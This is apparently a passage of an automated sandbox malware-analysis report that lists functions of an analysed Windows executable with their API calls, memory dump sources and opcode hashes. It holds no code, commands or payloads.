                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$PointerReadwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2027716870-0
                                                                                                                                                                                                                                  • Opcode ID: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
                                                                                                                                                                                                                                  • Instruction ID: 8e5637f0c6afa0013300979c193a8b9475ce08824852a7f6775797156de60d7d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1d3a7d486c6b86bccdea9d2ad81ee3c8c98c4cef3a960bb8e5e7f735770045
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC31B2719082549FD721DF28C8457EABBF5BB41305F4481BFE88967381CB385A85CF4A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407779 Relevance: 3.0, APIs: 2, Instructions: 29processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3712363035-0
                                                                                                                                                                                                                                  • Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                  • Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 415043291-0
                                                                                                                                                                                                                                  • Opcode ID: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                  • Instruction ID: df9a40891ed5a6603638aa450cb2a5da2b508cd079f162d5418714098e0b767a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 426097edd153d553548d4258e2616868f6f2f385adb449bbb098b549bd1fea02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F0D4B06083059FC700EF29D48874EBBF4BF88354F50892CE89987391D374D9848FA2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407A46 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(?,00000000,00000000), ref: 00407A53
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,?,00000000,00000000), ref: 00407A69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                  • Instruction ID: 98ca1ea5d0757272cd0f040fa3ed5e2b23fe950f5b76aa7c06b1bcfd26805678
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe73ec25996ed32e413a4c8f7db69d9afd32e501594e36b189c3cfe4dd8ed10
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE08CB0A04708ABC710EF78CC8481EBABCAA54320B90462CF5A5C32D1C234A9408B36
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040774B Relevance: 3.0, APIs: 2, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1375471231-0
                                                                                                                                                                                                                                  • Opcode ID: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                  • Instruction ID: 75174e167af6e085340da124bff1779b24b122a40ba15240be09f0de69b02ea8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90b9da684f5562d28c975c8ac90b4c5e18001f0206505df7b5a45aab19218db1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D05E70B042056BC700EF78D808A1B7AF9AB90744F40C43CA985C3240FA74D8018B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404316 Relevance: 2.5, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                  • Instruction ID: dd570ae04773ec1d9248e7accc602cb5589f5768ce779b06ba6b6fcb8a9dd89b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 649e6f128e3e3456b5732b19daa21c0c85ead406cb5e4731a410a6a558bb4ff6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0F8B05047049AC320BF789D4841A76A8AB81329BA44B3DF5B4E62E0D73894628B6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403B31 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                                                                                                  • Opcode ID: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                  • Instruction ID: c8608c254b430b602e84f9c27618fc09d2b238f80b7c42c251c9764424cdbd58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9fbaa86d6978b07d32e4ed4dfea1cd2918fff6c7b81506297058148a916158
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9D067B45043049FD300FF6CD54970ABBE4AB44344F80C828E98897251D679D4548B96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040183B Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32 ref: 00401855
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                  • Instruction ID: 66959b0bba6a1c3021cfc6ef215295b74c1233013eb20c9b72e5f533845a5747
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 930f9914d92cfff6ea62ae6309475c970d132ca45c7eec98b9a44305c1f331e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33D0A7B010C201DED3006F248C0053BB6F4AF84300F20863DF0C6A31E4C334C8836B2A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0040710B Relevance: 48.4, APIs: 32, Instructions: 358windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ClipboardShow$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleItemLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1085758737-0
                                                                                                                                                                                                                                  • Opcode ID: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                  • Instruction ID: 5e12382b9bf781896070c4bfdd92391929ae8e3bc4ad132af5f990d2ac7018d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: feee37f5bd17380af7e6bceb262dc60c434c655d728a8cbcfb2b4a38510d0af8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAF1E5B0908304AFD710EF68D98866EBFF4FF84314F41892DE89997291D7789885CF96
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402988 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32 ref: 00402A22
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000434000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000437000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.0000000000438000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138744359.000000000043C000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_7g1UcaWDIadEWTPuXfBgjhjE.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                                                                                  • String ID: 4A
                                                                                                                                                                                                                                  • API String ID: 123533781-205151761
                                                                                                                                                                                                                                  • Opcode ID: ca4e342dd9a4d1c448b3aa248cf2cd94cc217ce03813331fd364ede4b0128604
                                                                                                                                                                                                                                  • Instruction ID: d305ef95405f15bde97fa7dd711ba6fc9ffd0a80db07f91d6d56198472658b67
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca4e342dd9a4d1c448b3aa248cf2cd94cc217ce03813331fd364ede4b0128604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51614CB0A087119FD710EF69C9886AABBF4FF88314F008AADE58897391D7749885CF55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404FED Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 461windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.2137949924.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2137864862.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138031553.000000000040A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138064237.000000000040B000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.0000000000412000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000041E000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.2138144454.000000000042A000.00000004.00000001.01000000.00000010.sdmpDownload File
